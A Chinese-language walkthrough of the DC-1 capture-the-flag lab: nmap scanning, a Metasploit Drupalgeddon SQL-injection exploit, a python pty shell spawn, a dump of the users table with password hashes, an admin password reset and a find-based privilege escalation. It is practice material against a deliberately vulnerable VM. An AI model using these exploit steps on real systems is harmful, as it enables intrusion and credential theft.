DC1靶机练习

环境

kali2018、DC靶机、VM

扫描主机

1、net模式下查看DC的MAC地址如下
2、在开启DC的同时打开kali执行命令

nmap -sn 192.168.80.0/24 

扫描到的地址中192.168.80.138是kali本机的地址，192.168.80.139为目标靶机DC的ip，直接用浏览器访问就可以看到DC的界面如下

查看网站会发现Drupal框架，没有其他可用信息，进行端口扫描

端口扫描

nmap -p- -A -v 192.168.80.139

扫描结果如下：

共扫描到4个端口，其中在80端口发现robots.txt，可以尝试直接访问
得到robots.txt内容如下

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

没有获得多余的有用信息，进入下一步扫描网站目录

使用msfconsole中的目录扫描器来扫描网站目录

root@kali:~# msfconsole
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.80.139
msf auxiliary(scanner/http/dir_scanner) > set THREADS 20
msf auxiliary(scanner/http/dir_scanner) > show options
msf auxiliary(scanner/http/dir_scanner) > run

扫描结果如下，但是大多数网站都是403，其他的也没有实际用处

在msfconsole中查询并尝试针对Drupal的工具

msf > search drupal

发现内容：

Matching Modules
================

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

使用第三个命令进行SQL注入，依次执行以下命令：

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 192.168.80.139
RHOST => 192.168.80.139
msf exploit(multi/http/drupal_drupageddon) > run

得到以下结果说明成功注入

然后ls查看会发现有一个flag1.txt文件，网站查看会发现一句提示，所以接下来就要去找配置文件

drupal的配置文件位于/sites/default/settings.php，跳转过去查看

数据库操作

进入数据库失败，输入shell切换壳再次输入命令会进入到数据库中，但是不可以回显信息

mysql -udbuser -p

使用以下语句在shell回显信息。

python -c 'import pty;pty.spawn("/bin/sh")'

得到信息

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

从shell端输入命令修改密码
然后返回数据库更新密码

在浏览器登录admin会发现flag3的信息

使用find命令提权

提示需要特殊权限才能获得密码，先查看passwd发现flag4的位置
进入到flag4的位置查看发现内容，显示需要提权才能访问
进入shell端使用root进行find命令会发现最终的flag

查看最终的flag，结束！

cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

参考文章1
参考文章2